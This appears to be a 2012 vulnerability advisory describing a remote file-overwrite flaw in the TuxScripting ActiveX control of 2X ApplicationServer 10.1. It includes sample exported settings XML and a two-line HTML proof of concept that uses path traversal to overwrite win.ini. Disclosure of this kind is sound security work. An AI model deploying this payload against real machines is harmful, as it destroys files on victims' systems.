2X ApplicationServer 10.1 TuxSystem Class ActiveX Control Remote File Overwrite Vulnerability

2012-03-19 18:15:09

2X ApplicationServer 10.1 TuxSystem Class ActiveX Control TuxScripting.dll
ExportSettings Remote File Overwrite Vulnerability
tested against: Microsoft Windows Server 2003 r2 sp2
Internet Explorer 8
vendor description:
"2X Software is a global leader of desktop and application delivery,
remote access and cloud computing solutions."
2x homepage: http://www.2x.com/
download url: http://www.2x.com/applicationserver/download/
file tested: 2XAppServer.msi
Background:
The mentioned product installs an ActiveX control with
the following settings:
ProgID: TuxScripting.TuxSystem.1
CLSID: {5BD64392-DA66-4852-9715-CFBA98D25296}
Binary Path C:\Program Files\2X\ApplicationServer\TuxScripting.dll
Implements IObjectSafety: Yes
Safe for Scripting: True
Safe for Initialization: ?
According to the IObjectSafety interface this control is Safe for Scripting
then Internet Explorer will allow access to the availiable methods and
properties.
Vulnerability:
Two methods perform unsecure file operations (read/write):
...
/* DISPID=13 */
function ImportSettings(
/* VT_BSTR [8] */ $FileName
)
{
/* method ImportSettings */
}
/* DISPID=14 */
function ExportSettings(
/* VT_BSTR [8] */ $FileName
)
{
/* method ExportSettings */
}
...
by passing an existing file path to the ExportSettings() the
resulting file content will look like this:
<Setup
xmlns:dt="urn:schemas-microsoft-com:datatypes"><Connection><CGW_FGWs dt:d
t="string"><Default></CGW_FGWs><CGW_HTTPs dt:dt="string"><Default></
CGW_HTTPs><CGW_IPs dt:dt="string">192.168.2.101:0</CGW_IPs><CGW_PUBs dt:dt="stri
ng"><Default></CGW_PUBs><Domain
dt:dt="string">WORKGROUP/SERVER</Domain><I
D dt:dt="ui4">2</ID><LocalInst
dt:dt="ui4">1</LocalInst><RanID
dt:dt="ui4">12638
38571</RanID><SecLevAuth><ExcGWIPsLst
dt:dt="string"><Default></ExcGWIPsLs
t></SecLevAuth><Server
dt:dt="string">SERVER</Server></Connection><LoadBalancer> <PersTime
dt:dt="ui4">1279870543</PersTime><ServerIndex
dt:dt="ui4">2</ServerInd
ex><VDIHosts><VDIHostsIndex
dt:dt="ui4">2</VDIHostsIndex></VDIHosts><VDIHostsGro
up><VDIHostGroupIndex
dt:dt="ui4">0</VDIHostGroupIndex></VDIHostsGroup></LoadBal
ancer><Product><Build
dt:dt="ui4">1204</Build><Major
dt:dt="ui4">10</Major><Mino
r dt:dt="ui4">1</Minor><Name
dt:dt="string">VDS</Name></Product><Publishing><Out
putDir dt:dt="string">C:\Program Files\Internet Explorer\web\output</OutputDir><
WebPageTemplate dt:dt="string">C:\Program Files\Internet Explorer\web\2X_default
_style.xslt</WebPageTemplate></Publishing><Redundancy><BCtrls><BCtrl0001><ID
dt:
dt="ui4">1</ID><Priority
dt:dt="ui4">0</Priority><Server
dt:dt="string">SERVER</
Server></BCtrl0001></BCtrls><IDCntr
dt:dt="ui4">1</IDCntr><MasterServer
dt:dt="s
tring">SERVER</MasterServer><SettingsCount
dt:dt="ui4">1</SettingsCount><Setting
sID dt:dt="ui4">1326947769</SettingsID><SettingsTime
dt:dt="ui4">1326947769</Set
tingsTime></Redundancy><Reporting><Rprtng2X><RprtSrv
dt:dt="string"></RprtSrv></
Rprtng2X><RprtngEG><RprtSrv
dt:dt="string"></RprtSrv></RprtngEG></Reporting></Se
tup> If a remote attacker is able to take control of the file content, could also be
capable to run arbitrary code. At the time of this report, this could not be achieved yet
(I have experienced some unuseful crashes by calling ImportSettings() ...)
As attachment, proof of concept code which overwrites win.ini
POC:<html> <script>var obj = new ActiveXObject("TuxScripting.TuxSystem.1");
obj.ExportSettings("../../../../../../../../windows/win.ini");</script>

Fixes

No fixes

In order to submit a new fix you need to be registered.